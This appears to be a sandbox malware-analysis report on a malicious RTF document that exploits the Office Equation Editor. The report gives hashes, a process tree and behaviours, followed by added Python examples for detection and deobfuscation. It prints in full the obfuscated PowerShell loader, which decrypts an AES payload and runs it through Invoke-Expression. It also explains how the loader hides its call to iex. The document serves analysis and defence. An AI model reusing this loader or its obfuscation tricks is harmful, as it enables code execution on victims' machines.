Analysis
max time kernel: 99s
max time network: 44s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 29-07-2024 13:26
Static task: static1
Behavioral task: behavioral1
Sample: f7c34c11bb5d9cdcece78edae0beff42.rtf
Resource: win7-20240704-en
Behavioral task: behavioral2
Sample: f7c34c11bb5d9cdcece78edae0beff42.rtf
Resource: win10v2004-20240709-en
General
Target: f7c34c11bb5d9cdcece78edae0beff42.rtf
Size: 94KB
MD5: f7c34c11bb5d9cdcece78edae0beff42
SHA1: 96f2510fbb5c6203e21ead4dd55daaab59a86f4e
SHA256: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
SHA512: 9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
SSDEEP: 768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
Blocklisted process makes network request 2 IoCs
Processes: EQNEDT32.EXE, powershell.exe
flow | pid | process
3 | 2368 | EQNEDT32.EXE
5 | 2112 | powershell.exe
Drops file in System32 directory 1 IoCs
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: WINWORD.EXE, EQNEDT32.EXE, WScript.exe, powershell.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
pid | process
2152 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes: powershell.exe
pid | process
2112 | powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
description | pid | process
Token: SeDebugPrivilege | 2112 | powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: WINWORD.EXE
pid | process
2152 | WINWORD.EXE
2152 | WINWORD.EXE
Suspicious use of WriteProcessMemory 12 IoCs
Processes: EQNEDT32.EXE, WScript.exe, WINWORD.EXE
description | pid | process | target process
PID 2368 wrote to memory of 2784 | 2368 | EQNEDT32.EXE | WScript.exe
PID 2368 wrote to memory of 2784 | 2368 | EQNEDT32.EXE | WScript.exe
PID 2368 wrote to memory of 2784 | 2368 | EQNEDT32.EXE | WScript.exe
PID 2368 wrote to memory of 2784 | 2368 | EQNEDT32.EXE | WScript.exe
PID 2784 wrote to memory of 2112 | 2784 | WScript.exe | powershell.exe
PID 2784 wrote to memory of 2112 | 2784 | WScript.exe | powershell.exe
PID 2784 wrote to memory of 2112 | 2784 | WScript.exe | powershell.exe
PID 2784 wrote to memory of 2112 | 2784 | WScript.exe | powershell.exe
PID 2152 wrote to memory of 976 | 2152 | WINWORD.EXE | splwow64.exe
PID 2152 wrote to memory of 976 | 2152 | WINWORD.EXE | splwow64.exe
PID 2152 wrote to memory of 976 | 2152 | WINWORD.EXE | splwow64.exe
PID 2152 wrote to memory of 976 | 2152 | WINWORD.EXE | splwow64.exe
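The chain the signatures above record (EQNEDT32.EXE writing into and spawning WScript.exe, which in turn launches a heavily obfuscated PowerShell command) is what a defender would key on rather than any single file hash. The following is an added detection example written for this page; it is not part of the report or of the sandbox's own rules. It runs three rules over constructed process-creation records in the shape of Sysmon Event ID 1 that mirror the tree recorded above. The two root parents (explorer.exe, svchost.exe), their PIDs and the shortened PowerShell command line are assumptions; the image paths, PIDs and the other command lines are the ones the report shows.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records (Sysmon Event ID 1 shape) mirroring the tree in the
# report. Parents of the two roots (explorer.exe, svchost.exe), their PIDs and the shortened
# PowerShell command line are assumptions, not data from the report.
EVENTS = [
    {"pid": 2152, "ppid": 1000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f7c34c11bb5d9cdcece78edae0beff42.rtf"'},
    {"pid": 976, "ppid": 2152,
     "parent_image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmd": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 2368, "ppid": 600, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 2784, "ppid": 2368,
     "parent_image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\SysWOW64\WScript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"'},
    {"pid": 2112, "ppid": 2784, "parent_image": r"C:\Windows\SysWOW64\WScript.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     # Shortened stand-in for the report's command line: same wrapper, inner script elided.
     "cmd": r"""powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {...}e4j)-rEplACe ([CHar]67+[CHar]110+[CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"""},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# (pattern, minimum number of matches) pairs; each satisfied pair adds one to the score.
OBFUSCATION_MARKERS = [
    (re.compile(r"\[char\]\d+", re.I), 3),                   # strings assembled from char codes
    (re.compile(r"-c?replace\s", re.I), 1),                  # token-substitution layers
    (re.compile(r"preference\.tostring\(\)\[", re.I), 1),    # iex spelled from $VerbosePreference
    (re.compile(r"invoke-expression|\biex\b", re.I), 1),
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def obfuscation_score(cmd):
    """Count of obfuscation markers present at or above their threshold."""
    return sum(1 for rx, n in OBFUSCATION_MARKERS if len(rx.findall(cmd)) >= n)


def check(ev):
    """Return the rule names one process-creation record trips."""
    hits = []
    parent, image = basename(ev["parent_image"]), basename(ev["image"])
    if parent == "eqnedt32.exe":              # Equation Editor has no reason to spawn anything
        hits.append("equation_editor_spawned_child")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_launched_powershell")
    if image == "powershell.exe" and obfuscation_score(ev["cmd"]) >= 2:
        hits.append("obfuscated_powershell_command")
    return hits


def evaluate(events):
    """(pid, rule) pairs for every record that trips a rule, in event order."""
    return [(ev["pid"], rule) for ev in events for rule in check(ev)]


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(f"PID {pid}: {rule}")
```

Run against the constructed records, the first rule fires on WScript.exe (PID 2784) and the other two on powershell.exe (PID 2112). WINWORD.EXE spawning splwow64.exe is deliberately not flagged: that is the ordinary 32-bit print-driver helper on 64-bit Windows, so a rule on "Office spawned a child" alone would be noisy; the Equation Editor parent is the specific thing worth alerting on.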
Processes
-
Level 1: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f7c34c11bb5d9cdcece78edae0beff42.rtf"
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2152
Level 2: C:\Windows\splwow64.exe
Command line: C:\Windows\splwow64.exe 12288
PID: 976
Level 1: C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID: 2368
Level 2: C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2784
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2112
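The PowerShell command line above is a two-layer string-substitution wrapper around an AES-CBC decryptor that ends in Invoke-Expression. Each layer is a parenthesised concatenation of single-quoted fragments followed by -replace/-creplace operators whose arguments are either quoted literals or [Char] sequences (e4j becomes the single quote, AQM the pipe, CnI the double quote, TMI the dollar sign), and the final pipeline target &( $VerbosePreference.ToString()[1,3]+'x'-join'') spells iex from the default value "SilentlyContinue". Below is an added example of unwrapping such a command in Python; it is written for this page and is neither the report's nor the sample's code. Because the ciphertext on this page is elided, the embedded SAMPLE_COMMAND is a constructed, shortened command that uses the same tokens and wrapper shape around a toy inner script. The aes_decrypt function mirrors the sample's Decrypt-AESEncryption routine (key = SHA-256 of the UTF-8 key string, IV = first 16 bytes of the blob, zero padding trimmed) and relies on the third-party cryptography package, which is an assumption; it is imported inside the function so the unwrapping runs without it.

```python
import base64
import hashlib
import re

# Constructed stand-in for the -command argument: same wrapper shape and tokens as the
# sample (e4j -> ', AQM -> |, CnI -> ", TMI -> $) around a toy inner script and key.
SAMPLE_COMMAND = r"""(('((e4jTMIchave = CnIk3y-constructedCnI;TMItex'+'toCriptografadoBase4j+e4je64 = CnIQUJDCnI;Invoke-Expressioe4j+e4jn TMItextoCriptografadoBase64;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"""

# One wrapper layer: (( '...'+'...' ) -replace PAT,REP -creplace PAT,REP ... ) | <invoke>
LAYER = re.compile(r"^\s*\(*\s*(?P<lit>'.*?')\s*\)\s*(?P<ops>-c?replace.*)$",
                   re.IGNORECASE | re.DOTALL)
CHARS = r"(?:\[char\]\d+\+?)+"                      # [Char]67+[Char]110+[Char]73
ARG = rf"(?:'(?:[^']|'')*'|\(?{CHARS}\)?)"          # quoted literal or char sequence
OP = re.compile(rf"-(c?)replace\s*({ARG})\s*,\s*({ARG})", re.IGNORECASE)


def decode_arg(arg):
    """'e4j' -> e4j ; ([Char]67+[Char]110+[Char]73) -> CnI."""
    if arg.startswith("'"):
        return arg[1:-1].replace("''", "'")
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", arg, re.IGNORECASE))


def peel(expr):
    """Evaluate one wrapper layer: join the 'a'+'b' fragments, then apply the replace
    operators left to right as PowerShell would. Returns None if expr is not a wrapper."""
    m = LAYER.match(expr)
    if not m:
        return None
    text = m.group("lit")[1:-1].replace("'+'", "")
    for cflag, pat, rep in OP.findall(m.group("ops")):
        flags = 0 if cflag else re.IGNORECASE   # -replace ignores case, -creplace does not
        text = re.sub(decode_arg(pat), lambda _m, r=decode_arg(rep): r, text, flags=flags)
    return text


def deobfuscate(command):
    """Peel wrapper layers until plain script remains; returns every stage, outermost first."""
    stages = [command]
    while (nxt := peel(stages[-1])) is not None:
        stages.append(nxt)
    return stages


def invoke_alias(verbose_preference="SilentlyContinue"):
    """&( $VerbosePreference.ToString()[1,3]+'x'-join'' ): characters 1 and 3 of the
    default value are 'i' and 'e', so the pipeline ends in iex without naming it."""
    return verbose_preference[1] + verbose_preference[3] + "x"


def extract_config(script):
    """Pull the key string and the base64 blob out of the recovered loader script."""
    key = re.search(r'\$chave\s*=\s*"([^"]*)"', script)
    blob = re.search(r'\$textoCriptografadoBase64\s*=\s*"([^"]*)"', script)
    return {
        "key": key.group(1) if key else None,
        "ciphertext_b64": blob.group(1) if blob else None,
        "invokes": "invoke-expression" in script.lower(),
    }


def aes_decrypt(ciphertext_b64, key_string):
    """Mirror of the sample's Decrypt-AESEncryption: AES-256-CBC, key = SHA256(UTF-8 key
    string), IV = first 16 bytes of the blob, zero padding trimmed. Needs the third-party
    'cryptography' package (assumed installed); imported here so the rest runs without it."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    blob = base64.b64decode(ciphertext_b64)
    key = hashlib.sha256(key_string.encode("utf-8")).digest()
    dec = Cipher(algorithms.AES(key), modes.CBC(blob[:16])).decryptor()
    plain = dec.update(blob[16:]) + dec.finalize()
    return plain.decode("utf-8", errors="replace").strip("\x00")


if __name__ == "__main__":
    stages = deobfuscate(SAMPLE_COMMAND)
    for i, stage in enumerate(stages):
        print(f"--- stage {i} ---\n{stage}")
    print("pipeline target:", invoke_alias())
    print(extract_config(stages[-1]))
```

To use it on the real command line, pass everything after -command as the string; peel joins the fragments before substituting, so outer splits that land inside a token (as in e4j+e4'+'j above) resolve correctly. The replace patterns are passed to re.sub as regular expressions because PowerShell's -replace operators are regex-based; for the plain alphanumeric tokens this loader uses that is equivalent to literal substitution. The recovered script's Write-Host line prints "Texto Descriptografado:" (Portuguese for "decrypted text"), which is a convenient place to dump the second stage if the sample is run under a debugger instead.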
Network
MITRE ATT&CK Enterprise v15
Downloads
Download 1
Filesize: 19KB
MD5: 883a161bbdf8c2dd10269f9b3e79d834
SHA1: 83674048ad3fc9a751031fa64992a8eae0053873
SHA256: e11337f4eac56272c13e4cb3e0a658c151a187e67351ba4449eb1326bcee57ab
SHA512: e6d7bea67c26f1d7015b44b251248bb6963641b117a523b8cdbf83c88f171a9098640570c0e79dff95868e9cff11ae989beb4e5c32dd2b905098ae070c6648e6
Download 2
Filesize: 403KB
MD5: 1e06a0b540d76abb6e2712fa7e37138a
SHA1: 1e7a793fe2bcd27f2757969043cdf5f5231e977e
SHA256: 7d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
SHA512: 2b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a